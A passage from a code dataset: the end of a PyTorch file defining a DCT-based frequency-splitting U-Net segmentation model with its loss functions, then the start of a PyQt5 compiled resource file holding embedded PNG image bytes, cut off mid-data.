num_classes=1,\n group=2,\n inter_channels=2048,\n backbone_name='res2net50_v1b_26w_4s',\n decoder_filters=(256, 128, 64, 32),\n parametric_upsampling=False,\n shortcut_features='default',\n decoder_use_batchnorm=True):\n super(DCTFreqUNet, self).__init__()\n\n self.backbone_name = backbone_name\n self.backbone = load_backbone_model(self.backbone_name, pretrained=True)\n\n self.conv1x1 = nn.Sequential(\n nn.Conv2d(inter_channels, 1, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)),\n nn.ReLU(inplace=True))\n\n shortcut_chs, bb_out_chs = self.infer_skip_channels()\n if shortcut_features != 'default':\n self.shortcut_features = shortcut_features\n\n self.low_upsample_block1 = UpsampleBlock(bb_out_chs, decoder_filters[0],\n skip_connection_channels=shortcut_chs[3],\n group=group)\n self.low_upsample_block2 = UpsampleBlock(decoder_filters[0], decoder_filters[1],\n skip_connection_channels=shortcut_chs[2],\n group=group)\n self.low_upsample_block3 = UpsampleBlock(decoder_filters[1], decoder_filters[2],\n skip_connection_channels=shortcut_chs[1],\n group=group)\n self.low_upsample_block4 = UpsampleBlock(decoder_filters[2], decoder_filters[3],\n skip_connection_channels=shortcut_chs[0],\n group=group)\n\n self.high_upsample_block1 = UpsampleBlock(bb_out_chs, decoder_filters[0],\n skip_connection_channels=shortcut_chs[3],\n group=group)\n self.high_upsample_block2 = UpsampleBlock(decoder_filters[0], decoder_filters[1],\n skip_connection_channels=shortcut_chs[2],\n group=group)\n self.high_upsample_block3 = UpsampleBlock(decoder_filters[1], decoder_filters[2],\n skip_connection_channels=shortcut_chs[1],\n group=group)\n self.high_upsample_block4 = UpsampleBlock(decoder_filters[2], decoder_filters[3],\n skip_connection_channels=shortcut_chs[0],\n group=group)\n\n self.low_stage1_conv = SubDecoder(decoder_filters[0], num_classes, scale_factor=16)\n self.low_stage2_conv = SubDecoder(decoder_filters[1], num_classes, scale_factor=8)\n self.low_stage3_conv = SubDecoder(decoder_filters[2], num_classes, scale_factor=4)\n self.low_stage4_conv = SubDecoder(decoder_filters[3], num_classes, scale_factor=2)\n\n self.high_stage1_conv = SubDecoder(decoder_filters[0], num_classes, scale_factor=16)\n self.high_stage2_conv = SubDecoder(decoder_filters[1], num_classes, scale_factor=8)\n self.high_stage3_conv = SubDecoder(decoder_filters[2], num_classes, scale_factor=4)\n self.high_stage4_conv = SubDecoder(decoder_filters[3], num_classes, scale_factor=2)\n\n def forward(self, x, mode='train'):\n features, x = self.backbone.forward_feature(x)\n\n x_dct = dct.dct_2d(x)\n x_compress = self.conv1x1(x)\n x_dct_compress = dct.dct_2d(x_compress)\n x_dct_compress = (x_dct_compress - torch.mean(x_dct_compress, dim=(2, 3), keepdim=True)) / torch.std(x_dct_compress, dim=(2, 3), keepdim=True)\n low_mask = (torch.sigmoid(x_dct_compress) >= 0.5).type(torch.int)\n\n x_dct_low = x_dct * low_mask\n x_dct_high = x_dct * (1 - low_mask)\n\n x_dct_low = dct.idct_2d(x_dct_low)\n x_dct_high = dct.idct_2d(x_dct_high)\n\n x_dct_high1 = self.high_upsample_block1(x_dct_high, features[-1])\n x_dct_high2 = self.high_upsample_block2(x_dct_high1, features[-2])\n x_dct_high3 = self.high_upsample_block3(x_dct_high2, features[-3])\n x_dct_high4 = self.high_upsample_block4(x_dct_high3, features[-4])\n\n x_dct_low1 = self.low_upsample_block1(x_dct_low, features[-1], x_dct_high1)\n x_dct_low2 = self.low_upsample_block2(x_dct_low1, features[-2], x_dct_high2)\n x_dct_low3 = self.low_upsample_block3(x_dct_low2, features[-3], x_dct_high3, viz=True)\n x_dct_low4 = self.low_upsample_block4(x_dct_low3, features[-4], x_dct_high4)\n\n edge_stage1 = self.high_stage1_conv(x_dct_high1)\n edge_stage2 = self.high_stage2_conv(x_dct_high2)\n edge_stage3 = self.high_stage3_conv(x_dct_high3)\n edge_stage4 = self.high_stage4_conv(x_dct_high4)\n\n region_stage1 = self.low_stage1_conv(x_dct_low1)\n region_stage2 = self.low_stage2_conv(x_dct_low2)\n region_stage3 = self.low_stage3_conv(x_dct_low3)\n region_stage4 = self.low_stage4_conv(x_dct_low4)\n\n if mode=='train':\n return [region_stage1, region_stage2, region_stage3, region_stage4], \\\n [edge_stage1, edge_stage2, edge_stage3, edge_stage4]\n else:\n return region_stage4\n\n def _calculate_criterion(self, criterion, y_pred, y_true, mode):\n if mode=='train':\n edge_true = sobel_filter(y_true)\n edge_true[edge_true >= 0.5] = 1; edge_true[edge_true < 0.5] = 0\n\n region_loss, edge_loss = 0, 0\n for region_pred, edge_pred in zip(y_pred[0], y_pred[1]):\n region_loss += self.structure_loss(region_pred, y_true)\n edge_loss += criterion(edge_pred, edge_true)\n\n loss = region_loss + edge_loss\n else:\n loss = criterion(y_pred, y_true)\n\n return loss\n\n def similarity_loss(self, low_freq, high_freq):\n low_freq, high_freq = low_freq.squeeze(), high_freq.squeeze()\n cos_loss = torch.sum(torch.abs(self.cos(low_freq, high_freq)))\n\n return cos_loss\n\n def structure_loss(self, pred, mask):\n weit = 1 + 5 * torch.abs(F.avg_pool2d(mask, kernel_size=31, stride=1, padding=15) - mask)\n wbce = F.binary_cross_entropy_with_logits(pred, mask, reduce='none')\n wbce = (weit * wbce).sum(dim=(2, 3)) / weit.sum(dim=(2, 3))\n\n pred = torch.sigmoid(pred)\n inter = ((pred * mask) * weit).sum(dim=(2, 3))\n union = ((pred + mask) * weit).sum(dim=(2, 3))\n wiou = 1 - (inter + 1) / (union - inter + 1)\n return (wbce + wiou).mean()\n\n def infer_skip_channels(self):\n x = torch.zeros(1, 3, 224, 224)\n\n [x, x1, x2, x3], x4 = self.backbone.forward_feature(x)\n channels, out_channels = [x.shape[1], x1.shape[1], x2.shape[1], x3.shape[1], x4.shape[1]], x4.shape[1]\n\n return channels, out_channels\n\nif __name__=='__main__':\n model = DCTFreqUNet(num_classes=1)\n inp = torch.randn(2, 3, 256, 256)\n oup = model(inp, mode='val')\n print(oup.shape)","repo_name":"skawngus1111/BGANet","sub_path":"IS2D_models/DCTFreqUNet.py","file_name":"DCTFreqUNet.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12570861487","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.12.1)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\xc5\\xf8\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x01\\xdb\\x00\\x00\\x01\\x76\\x08\\x06\\x00\\x00\\x00\\x26\\xf8\\x32\\x04\\\n\\x00\\x00\\x20\\x00\\x49\\x44\\x41\\x54\\x78\\x9c\\xec\\xdd\\x79\\xbc\\x1d\\x75\\\n\\x9d\\xe7\\xff\\x67\\xd5\\x3d\\xb9\\xdc\\xdc\\x84\\x4b\\x08\\x21\\x84\\x10\\x20\\\n\\x84\\x10\\x42\\x08\\x21\\x61\\x0d\\x8b\\x91\\xdd\\xa8\\x88\\x82\\x1b\\xd2\\x6e\\\n\\x6d\\x6b\\xab\\x6d\\x3b\\x8e\\xc3\\xf4\\xd0\\x3e\\x18\\x7f\\x0e\\x0f\\x7e\\x8e\\\n\\x0f\\x9a\\x1f\\xc3\\xaf\\xed\\x76\\x1c\\xc6\\xe9\\xd6\\x5e\\x46\\x7f\\x2e\\xa3\\\n\\xb6\\xe3\\x28\\xda\\x2e\\x80\\xb2\\x88\\x88\\x88\\xec\\x22\\x6b\\xd8\\x43\\x48\\\n\\x42\\x08\\xc9\\xcd\\xcd\\xa9\\xdf\\x1f\\xdf\\x53\\xde\\x93\\x4a\\x55\\x9d\\x73\\\n\\x43\\xb6\\x7b\\xef\\xf7\\xf5\\x78\\xdc\\xc7\\x3d\\xa7\\xea\\x5b\\xcb\\x39\\xa7\\\n\\xaa\\xde\\xdf\\xcf\\xf2\\xfd\\x7c\\x89\\x44\\x22\\xbb\\x8a\\x14\\x53\\x13\\xae\\\n\\xc0\\x33\\xb8\\x1c\\x53\\x77\\xed\\x29\\x45\\x22\\x91\\x48\\x24\\x32\\x76\\xe8\\\n\\xc5\\xdb\\x70\\xef\\x7e\\x6c\\x7e\\x2d\\xd9\\x7e\\x6c\\xc6\\xa3\\x09\\x7f\\x8e\\\n\\xfe\\x5d\\x7b\\x7a\\x91\\x48\\x64\\x7b\\x92\\xec\\xea\\x13\\x88\\x44\\xc6\\x19\\\n\\x29\\x16\\xe2\\x53\\x7d\\x2c\\x3f\\x85\\xfe\\xa5\\x98\\x80\\x26\\x7e\\x8d\\x1b\\\n\\x18\\x5a\\xc3\\x5d\\x09\\x97\\x67\\x7c\\x17\\x83\\xbb\\xf0\\x7c\\x23\\x91\\xc8\\\n\\x76\\x20\\x8a\\x6d\\x24\\xb2\\xf3\\x98\\x8a\\x3f\\x4b\\xf9\\xc8\\x7c\\xa6\\x9f\\\n\\x49\\x3a\\x4d\\x30\\x67\\x73\\x52\\x6c\\xc4\\xcd\\xf8\\x05\\x1b\\x5e\\xe6\\x06\\\n\\x7c\\x1a\\x37\\x61\\x68\\xa7\\x9f\\x71\\x24\\x12\\xd9\\x2e\\x44\\xb1\\x8d\\x44\\\n\\x76\\x3c\\x0d\\xbc\\x0e\\x97\\xee\\xcb\\x31\\x67\\xd0\\x38\\x5c\\xb8\\xf9\\xb2\\\n\\xb6\\xff\\xed\\xf4\\x60\\x35\\xae\\xa7\\x79\\x17\\x6b\\x07\\xf9\\x76\\xc2\\xdf\\\n\\x64\\xdc\\x29\\x8a\\x6e\\x24\\x32\\xea\\x88\\x62\\x1b\\x89\\xec\\x38\\x52\\xcc\\\n\\xc5\\xa5\\x7d\\x5c\\x70\\x3c\\x93\\x4f\\xc6\\x44\\xc1\\x65\\x5c\\xbc\\xf9\\x8a\\\n\\xc2\\x9b\\xb4\\xfe\\x9e\\xc4\\xf5\\x78\\x90\\x27\\x37\\xf3\\xcf\\xb8\\x06\\x8f\\\n\\xb4\\x76\\x13\\x89\\x44\\x46\\x01\\x3d\\xbb\\xfa\\x04\\x22\\x91\\x31\\xca\\x54\\\n\\xbc\\x2f\\xe1\\xbf\\xcd\\x65\\xd9\\x05\\xf4\\x1e\\x2d\\xdc\\x70\\xed\\x62\\xca\\\n\\x96\\x56\\x6d\\xd2\\xf6\\x3f\\x6b\\xfd\\x0d\\xe0\\x48\\xcc\\x64\\xcf\\xd5\\x9c\\\n\\xb4\\x8e\\xe5\\x59\\x48\\xb0\\x7a\\x18\\xeb\\x6d\\x6d\\x18\\x47\\x22\\x91\\xdd\\\n\\x8c\\x68\\xd9\\x46\\x22\\xdb\\x97\\x5e\\x9c\\x9a\\x70\\xe9\\x14\\x96\\x2d\\xa3\\\n\\xb1\\xb8\\xb5\\xa2\\x5d\\x64\\x8b\\x82\\xdb\\xbe\\xbe\\x7d\\x79\\xbb\\xb5\\x9b\\\n\\x62\\x13\\x7e\\x8b\\x9b\\x19\\x5a\\xc9\\x1d\\x19\\x57\\x0b\\x49\\x54\\x6b\\xb7\\\n\\xff\\x47\\x89\\x44\\x22\\xdb\\x8b\\x28\\xb6\\x91\\xc8\\xf6\\x21\\xc5\\x6c\\x7c\\\n\\x6c\\x0f\\xde\\xbd\\x90\\x29\\xa7\\x63\\x4f\\x21\\x01\\xaa\\xea\\x46\\x2b\\x13\\\n\\xdd\\xaa\\x76\\xb9\\xe8\\xf6\\x08\\xe6\\xec\\xad\\xb8\\x8d\\xc1\\x17\\xb9\\x0e\\\n\\x57\\xe2\\xe7\\xd8\\xf0\\x0a\\x3e\\x43\\x24\\x12\\xd9\\x41\\x44\\xb1\\x8d\\x44\\\n\\x5e\\x39\\x03\\x78\\x4b\\xca\\x5f\\x1c\\xc0\\xbc\\xb3\\x49\\x67\\x1b\\xce\\x62\\\n\\x2a\\x4b\\x80\\xca\\x97\\xb7\\xd3\\x2e\\xa8\\x45\\xeb\\xb7\\x68\\xf5\\x66\\x42\\\n\\xd6\\xd5\\x0b\\xf8\\x19\\xee\\x62\\xdd\\x06\\xbe\\x2d\\x88\\xee\\x3d\\x62\\x12\\\n\\x55\\x24\\xb2\\x5b\\x11\\xc5\\x36\\x12\\xd9\\x76\\x1a\\x38\\x26\\xe1\\x53\\x93\\\n\\x39\\xeb\\x64\\x7a\\x4f\\xb4\\xa5\\x60\\xd6\\x51\\xe5\\x56\\x6e\\xdf\\xb6\\x6c\\\n\\x3f\\x45\\x31\\x9e\\x80\\xa7\\xf0\\x23\\x3c\\xc4\\xea\\x21\\xbe\\x84\\xbf\\xc6\\\n\\x63\\x62\\x12\\x55\\x24\\xb2\\x5b\\x10\\xc5\\x36\\x12\\x19\\x39\\x29\\xa6\\xe1\\\n\\x63\\x3d\\xfc\\xd9\\x02\\xa6\\x9c\\x8d\\x29\\x82\\x39\\x59\\xe7\\x32\\xae\\x13\\\n\\xd1\\xaa\\xb6\\x9d\\x68\\x17\\xdd\\x07\\xf1\\x43\\x3c\\xc3\\x8a\\x66\\x88\\xe7\\\n\\x7e\\x49\\x18\\x45\\x14\\x45\\x37\\x12\\xd9\\x85\\x44\\xb1\\x8d\\x44\\xba\\x27\\\n\\x6d\\xfd\\xbf\\x00\\x9f\\x9e\\xc6\\xbc\\x73\\x71\\xa8\\x90\\xb8\\x54\\xcc\\x2e\\\n\\xae\\x7a\\xdf\\xbe\\x2c\\x5f\\x5e\\x74\\x33\\x77\\x6b\\xed\\x96\\xb9\\xa7\\x27\\\n\\xe0\\x37\\xf8\\x11\\xcd\\x35\\x3c\\x20\\x54\\xa2\\xfa\\xa6\\x18\\xcf\\x8d\\x44\\\n\\x76\\x19\\x51\\x6c\\x23\\x91\\xee\\xc8\\xc7\\xcc\\x5e\\x35\\x81\\xd7\\x9d\\x46\\\n\\x7a\\x8a\\xe1\\xe1\\x39\\x55\\xae\\xe3\\xba\\x0c\\xe3\\xf6\\xf5\\x45\\x21\\x2e\\\n\\x13\\xe6\\xb2\\x36\\x55\\xc2\\x9e\\xf7\\x0a\\x6e\\xc2\\xcf\\x68\\xbe\\xcc\\x2d\\\n\\xb8\\x0c\\x3f\\x11\\xe3\\xb9\\x91\\xc8\\x4e\\x27\\x8a\\x6d\\x24\\xd2\\x99\\x29\\\n\\xc2\\xe4\\x00\\x7f\\x31\\x9f\\x81\\x73\\x0d\\x67\\x19\\xd3\\x39\\xa6\\xaa\\xa2\\\n\\x5d\\xd9\\x36\\x9d\\x96\\x77\\x93\\x68\\xd5\\xde\\xae\\x07\\x2f\\x0b\\x45\\x31\\\n\\x7e\\xc5\\x86\\xc1\\xe0\\x65\\xbe\\x1c\\xb7\\xd5\\x9c\\x4e\\x24\\x12\\xd9\\xce\\\n\\x44\\xb1\\x8d\\x44\\xca\\x49\\x85\\x04\\xa8\\x73\\xf0\\x99\\xa9\\xcc\\x7f\\x2d\\\n\\x8d\\x79\\xb6\\xac\\x65\\xdc\\x4e\\x9d\\xc0\\x76\\xbb\\xbc\\x7d\\x5d\\xd5\\xfa\\\n\\xb2\\x63\\x76\\x72\\x31\\xf7\\xe0\\x79\\x5c\\x47\\xf3\\x6e\\xd6\\x6e\\xe6\\x1b\\\n\\x42\\xe6\\xf2\\x03\\x1d\\x0e\\x11\\x89\\x44\\xb6\\x03\\x51\\x6c\\x23\\x91\\xad\\\n\\x49\\x31\\x1f\\x97\\xee\\xc1\\x9b\\x96\\xd2\\x7f\\x8a\\x50\\xad\\x22\\xcf\\x32\\\n\\xea\\x36\\x3e\\x5b\\x66\\x99\\x6e\\xeb\\xba\\x57\\xb2\\xdf\\x7c\\xdb\\x04\\x2b\\\n\\xf0\\x13\\x9a\\x0f\\xf1\\x2c\\xfe\\x3b\\x3e\\x27\\xbc\\x8e\\x44\\x22\\x3b\\x88\\\n\\x28\\xb6\\x91\\xc8\\x96\\x4c\\xc5\\xfb\\x53\\x3e\\x72\\x28\\xb3\\xce\\x26\\x9d\\\n\\x6e\\xcb\\x5a\\xc6\\x75\\x96\\x64\\x37\\x71\\xd5\\xe2\\xfa\\xaa\\xf7\\x65\\xfb\\\n\\xcf\\xe9\\xe6\\xc6\\xad\\xeb\\x08\\x64\\x82\\x49\\x7b\\x3d\\x43\\x4f\\x85\\x24\\\n\\xe6\\xab\\xf1\\x35\\x21\\x73\\x39\\x12\\x89\\x6c\\x67\\xa2\\xd8\\x46\\x22\\x81\\\n\\x5e\\x9c\\x81\\x4f\\xec\\xc3\\xd2\\x57\\xd3\\xbb\\x50\\x30\\x71\\xcb\\x84\\xb6\\\n\\xca\\xd2\\xac\\x8b\\xd7\\xd6\\x59\\xa7\\x9d\\x0a\\x59\\xb4\\xef\\x87\\x7a\\xe1\\\n\\xad\\xcb\\x62\\x6e\\x5f\\x9e\\x97\\x7f\\xbc\\x03\\x37\\x32\\xb8\\x86\\xdb\\xb3\\\n\\xe0\\x5a\\xbe\\x56\\x28\\x52\\x15\\x89\\x44\\xb6\\x13\\x51\\x6c\\x23\\x11\\xe6\\\n\\xe1\\xe2\\x3e\\xde\\xb6\\x84\\x29\\xa7\\x60\\xb2\\x61\\x91\\xed\\x64\\xc9\\x8e\\\n\\x64\\x4c\\x6c\\xbe\\x1d\\xf5\\x56\\x6d\\x37\\x56\\x6f\\xd9\\xba\\x6e\\xdc\\xcf\\\n\\xf9\\xfb\\xf6\\x24\\xaa\\x75\\xc2\\x1c\\xba\\xbf\\x66\\xfd\\x4b\\xfc\\x28\\xe1\\\n\\xea\\x2c\\x24\\x33\\xc7\\x89\\xeb\\x23\\x91\\xed\\x40\\x14\\xdb\\xc8\\x78\\x66\\\n\\x00\\x17\\xa5\\x7c\\xfc\\x60\\xe6\\x9e\\x41\\x7a\\xa0\\xe1\\xe1\\x3c\\x39\\xdb\\\n\\x23\\x8b\\xb8\\xd3\\xfa\\x4e\\x43\\x84\\xea\\xda\\x75\\x73\\xcc\\x6e\\xc4\\xbc\\\n\\x07\\x2b\\x85\\xf2\\x8f\\xf7\\xb1\\x6a\\x43\\x48\\xa2\\xfa\\x9c\\x58\\xfe\\x31\\\n\\x12\\x79\\xc5\\x44\\xb1\\x8d\\x8c\\x47\\x7a\\x71\\x1c\\x3e\\x39\\xc0\\x59\\xcb\\\n\\x68\\x2c\\x11\\xdc\\xaa\\xdb\\x62\\xa5\\x8e\\x54\\x8c\\xbb\\x2d\\xe5\\x38\\xd2\\\n\\x9b\\x73\\xa4\\x93\\x1a\\x54\\x2d\\x4f\\x85\\x3a\\x8f\\x37\\xe0\\x61\\x9e\\x6c\\\n\\x95\\x7f\\xfc\\x82\\x58\\xfe\\x31\\x12\\xd9\\x66\\xa2\\xd8\\x46\\xc6\\x13\\x29\\\n\\x66\\xe0\\xe3\\x13\\x78\\xff\\x42\\xa6\\x9c\\x21\\x98\\xb7\\x65\\x63\\x66\\xab\\\n\\xdc\\xc4\\xdd\\x26\\x3e\\x75\\xb2\\x34\\xcb\\xb6\\x1d\\x29\\x23\\x49\\x9a\\xea\\\n\\x94\\xd1\\xac\\x64\\xf9\\xfd\\xb8\\x9e\\xe6\\x33\\x3c\\xd0\\xe4\\x6f\\x84\\x24\\\n\\xaa\\x95\\xdb\\x78\\xba\\x91\\xc8\\xb8\\x25\\x8a\\x6d\\x64\\xbc\\x30\\x19\\xaf\\\n\\x4b\\xb9\\x6c\\x3a\\xf3\\x97\\x63\\x8e\\x2d\\x7d\\xa3\\x75\\x15\\x99\\xda\\x97\\\n\\x95\\x2d\\xaf\\x1b\\x47\\x5b\\x95\\x04\\xd5\\xbe\\xed\\x2b\\xb5\\x74\\xeb\\xc4\\\n\\xbb\\xdb\\xe4\\xad\\xb2\\xcf\\x97\\x0a\\x1d\\x91\\x5f\\xe3\\x46\\x9a\\xab\\x43\\\n\\x12\\xd5\\x15\\xf8\\x9e\\x98\\x44\\x15\\x89\\x74\\x4d\\x14\\xdb\\xc8\\x58\\xa7\\\n\\x81\\x05\\xf8\\x54\\x1f\\xe7\\x9d\\x42\\xe3\\x55\\xb6\\x2c\\xb3\\x98\\x53\\x97\\\n\\x5c\\x34\\x12\\x41\\xec\\x94\\xb1\\x5c\\xc7\\xcb\\xe8\\xab\\x38\\x6e\\x9d\\x85\\\n\\x5d\\x97\\x79\\xdc\\xe9\\x7c\\x3b\\x91\\xc7\\x73\\x37\\xe2\\x46\\xfc\\x82\\xa1\\\n\\x0d\\xa1\\xec\\xe3\\xe5\\xc2\\xb4\\xba\\x31\\x89\\x2a\\x12\\xe9\\x40\\xcf\\xae\\\n\\x3e\\x81\\x48\\x64\\x07\\x91\\x62\\x2f\\xfc\\xfb\\x94\\x6b\\xe6\\xb1\\xe4\\x22\\\n\\xd2\\xf9\\x86\\x27\\x73\\x2f\\x0a\\x4d\\xd9\\xfb\\xa4\\x62\\x5d\\x4e\\x56\\xd2\\\n\\xa6\\xca\\xc5\\xdc\\x29\\xf1\\x29\\x11\\x0a\\x18\\xa7\\x82\\x6b\\xbb\\xea\\xb8\\\n\\x55\\xc7\\x2b\\x1e\\xab\\x93\\xc8\\xd7\\x0d\\x19\\x2a\\x23\\x2f\\x0e\\xbd\\x98\\\n\\xf4\\x65\\x0e\\x7d\\x96\\x77\\x66\\x61\\xd1\\x6f\\x85\\xf1\\xb9\\x65\\xa3\\x95\\\n\\x22\\x91\\x88\\x28\\xb6\\x91\\xb1\\x49\\x8a\\x73\\xf1\\xcf\\x53\\x79\\xfb\\x05\\\n\\xf4\\x9d\\x21\\x98\\xb8\\x75\\x43\\x61\\xda\\xdf\\xb7\\x2f\\xcb\\x97\\x57\\x09\\\n\\x56\\x99\\x5b\\x36\\xb1\\xb5\\x08\\x96\\x09\\x62\\xfb\\xb6\\xa9\\x60\\x2e\\xae\\\n\\xc2\\x22\\x5b\\xc6\\x91\\xab\\x86\\x0b\\xb5\\x1f\\xaf\\xfd\\x18\\x23\\x71\\x19\\\n\\xb7\\xaf\\xab\\x3b\\x46\\xfe\\xbe\\x81\\xa3\\xb0\\x80\\x9e\\xe7\\x59\\xf4\\x02\\\n\\xef\\x4d\\xc2\\x94\\x83\\x77\\xe1\\xc5\\x92\\x5d\\x47\\x22\\xe3\\x9e\\x28\\xb6\\\n\\x91\\xb1\\xc6\\x7c\\xfc\\xd7\\x5e\\x3e\\xf9\\x2a\\xf6\\x7f\\xab\\x50\\x12\\x2a\\\n\\xb7\\x66\\xa9\\xb6\\x00\\xdb\\xdf\\x77\\xb2\\x7a\\x8b\\xeb\\xaa\\xac\\xe0\\xb2\\\n\\xd7\\xc5\\xb6\\xf9\\xdf\\x3a\\x61\\x96\\x80\\x95\\x38\\x5e\\xb8\\x39\\xcb\\xb6\\\n\\xa9\\x3a\\xf7\\xb2\\xe5\\x89\\xea\\xf3\\x2b\\x13\\xdd\\x6e\\xad\\xfb\\xcd\\x98\\\n\\x88\\x63\\x31\\x9b\\x3d\\x9e\\xe6\\xa4\\x75\\xfc\\x51\\x12\\x9a\\xdd\\x23\\x4e\\\n\\xe7\\x17\\x89\\x6c\\x41\\x14\\xdb\\xc8\\x58\\x61\\x00\\x1f\\xc7\\x35\\x87\\x73\\\n\\xec\\x85\\x34\\x16\\xa8\\xb7\\xec\\xea\\x7c\\x9e\\x65\\x96\\x6f\\x5d\\x55\\xa8\\\n\\xb2\\xed\\xaa\\xf6\\x51\\x66\\x45\\xa7\\x82\\x0b\\xf9\\x21\\x6e\\xcb\\x78\\x70\\\n\\x23\\x07\\x1f\\x61\\xeb\\x49\\x0f\\xaa\\xce\\xbb\\xca\\x62\\xee\\x26\\xa6\\x5b\\\n\\xf7\\x19\\x8b\\x9f\\x29\\x7f\\x9f\\xff\\x6d\\x16\\xa6\\x44\\x3a\\x0e\\xfb\\x30\\\n\\xf9\\x19\\xce\\x78\\x99\\xf3\\xf0\\x12\\x7e\\x27\\x14\\xa9\\x8a\\x44\\xc6\\x3d\\\n\\x31\\x41\\x2a\\x32\\xda\\x49\\xb1\\x1c\\x97\\x4d\\x65\\xf1\\xd9\\x34\\xe6\\xb7\\\n\\x56\\x74\\x23\\x38\\x65\\x37\\x40\\x5d\\x95\\xa8\\x6e\\x0a\\x47\\x74\\x33\\xb6\\\n\\xb6\\x28\\xf8\\x83\\xf8\\x6f\\xa1\\x64\\xe2\\x47\\x32\\x1e\\xe9\\xe1\\xfb\\x7f\\\n\\x4e\\x63\\x4a\\xe1\\xb3\\x14\\x3f\\x4f\\xdd\\x79\\x74\\x73\\x8e\\x23\\xf9\\x5c\\\n\\x75\\x9f\\x31\\x13\\x7e\\x88\\x41\\x61\\xee\\xbe\\x9b\\x19\\x7c\\x31\\xf4\\x1f\\\n\\xae\\xc0\\x8f\\xc4\\x24\\xaa\\xc8\\x38\\x27\\x5a\\xb6\\x91\\xd1\\x4a\\x8a\\x43\\\n\\x70\\x55\\x2f\\x9f\\x5a\\xca\\xec\\xf3\\x49\\xf7\\x57\\xed\\x1e\\x2d\\xcb\\x12\\\n\\xee\\x94\\xd1\\x5b\\x96\\x84\\x54\\x97\\x65\\x5c\\x97\\x98\\x54\\x15\\x7b\\xed\\\n\\x11\\x54\\xe9\\x1e\\xee\\xc6\\x7f\\xc0\\x83\\x19\\x87\\x3e\\xcd\\xc2\\x25\\x24\\\n\\xf9\\x7e\\xaa\\x5c\\xba\\xc5\\x73\\xef\\x24\\x8c\\xed\\xf1\\xe4\\xe2\\x39\\xb7\\\n\\xd3\\x4d\\x6c\\xb7\\xf8\\x7d\\xf5\\xe0\\x20\\x1c\\x15\\x5e\\x1e\\xbc\\x92\\x37\\\n\\x0e\\xb1\\x24\\x09\\x05\\x31\\x9e\\xb4\\x65\\xbf\\x21\\x12\\x19\\x37\\x44\\xb1\\\n\\x8d\\x8c\\x46\\xa6\\xe0\\x8f\\xf1\\xf9\\x43\\x38\\xfd\\xad\\xf4\\x1e\\x6d\\xeb\\\n\\x04\\xa8\\x2a\\xa1\\x2c\\x13\\xad\\x91\\xc6\\x2e\\x3b\\xc5\\x4f\\xab\\x04\\xbf\\\n\\xec\\xb8\\x2f\\xe0\\xbb\\xac\\x1f\\xe4\\x13\\xc2\\x50\\x9a\\xcd\\xf8\\xe5\\x1a\\\n\\xde\\xde\\xcb\\xc0\\xc1\\xb6\\x9c\\xda\\xaf\\x9b\\x4e\\x43\\xd9\\x67\\xeb\\x26\\\n\\x46\\x5b\\x46\\x5d\\xdc\\xb7\\x28\\xe2\\xf9\\x71\\xf6\\x10\\xd2\\x94\\xe7\\xd1\\\n\\xbb\\x81\\xc3\\x9f\\xe7\\xfc\\x26\\x07\\x0b\\x33\\x0c\\xbd\\x20\\x8a\\x6e\\x64\\\n\\x9c\\x11\\xc5\\x36\\x32\\x9a\\x68\\x60\\x19\\x3e\\x37\\x85\\x3f\\x3d\\x87\\x69\\\n\\xaf\\x11\\xaa\\x55\\x54\\x59\\x69\\x9d\\x44\\x35\\xa7\\xcc\\x7a\\x2c\\xee\\xa3\\\n\\xac\\x7d\\x55\\x9b\\x3a\\x17\\x6d\\x31\\x06\\xfa\\x5d\\x9a\\x4f\\x84\\x22\\x11\\\n\\x9f\\x36\\x1c\\xe3\\x5c\\x87\\x87\\x1e\\xe7\\xdc\\x03\\xe9\\xdd\\xdb\\xd6\\x56\\\n\\x71\\xa7\\xcf\\x5a\\xd6\\xbe\\xfd\\xdc\\xeb\\x84\\xb6\\xaa\\x4d\\x37\\x96\\x7f\\\n\\xfb\\xfb\\x49\\x38\\x82\\x64\\x36\\xfd\\x6b\\x39\\x76\\x0d\\x17\\x64\\x61\\x28\\\n\\xf1\\xef\\x85\\xb8\\x6e\\x14\\xdd\\xc8\\xb8\\x20\\x8a\\x6d\\x64\\x34\\x90\\xbb\\\n\\x8c\\xff\\xe3\\x1e\\xfc\\xe7\\x25\\x2c\\x38\\x9f\\x9e\\x43\\xd4\\x8f\\x67\\x1d\\\n\\x09\\x75\\xdb\\x54\\xb9\\x52\\xbb\\x29\\x1c\\x51\\xb5\\x3e\\x77\\xb9\\xde\\x8e\\\n\\x5b\\x78\\x34\\xe3\\xc3\\x78\\xbc\\xd0\\xe4\\x81\\xcd\\x4c\\x7a\\x84\\x93\\x0e\\\n\\x23\\x9d\\xa4\\x3a\\xf6\\x5b\\xe6\\xae\\x2e\\xba\\x94\\xd5\\x2c\\xeb\\xd4\\x79\\\n\\x28\\x2e\\xaf\\x8b\\xf1\\x96\\x89\\xfb\\xde\\x38\\x8a\\x64\\x5f\\x06\\x9e\\xe3\\\n\\xf4\\xf5\\x9c\\x23\\xd4\\xc9\\x78\\x54\\xa8\\xe5\\x11\\x89\\x8c\\x69\\xa2\\xd8\\\n\\x46\\x76\\x77\\x06\\x70\\x61\\xca\\x67\\x0f\\xe0\\xdc\\xf3\\xe8\\x5f\\x2a\\x98\\\n\\xb8\\x6c\\x19\\x7f\\xac\\x12\\x1c\\xb6\\xb6\\x32\\xeb\\x62\\xb4\\x75\\xfb\\xea\\\n\\x64\\xad\\xb6\\xef\\xa7\\xca\\x8d\\x4d\\xe8\\x3d\\x3c\\x81\\xef\\xb0\\x7e\\x23\\\n\\x7f\\x89\\x1f\\xd8\\xda\\xca\\xcb\\x70\\xeb\\x06\\xe6\\x3c\\xc9\\x11\\x87\\x93\\\n\\xf6\\x2a\\xb7\\x20\\xcb\\xce\\xa3\\xca\\xad\\xdc\\x8d\\xab\\x79\\x24\\x09\\x58\\\n\\x55\\xae\\xf9\\xe2\\xfe\\x08\\x85\\xa9\\x8f\\x26\\xe9\\x67\\xbf\\xe7\\x79\\xed\\\n\\x46\\x4e\\x16\\xdc\\xca\\x4f\\x88\\x49\\x54\\x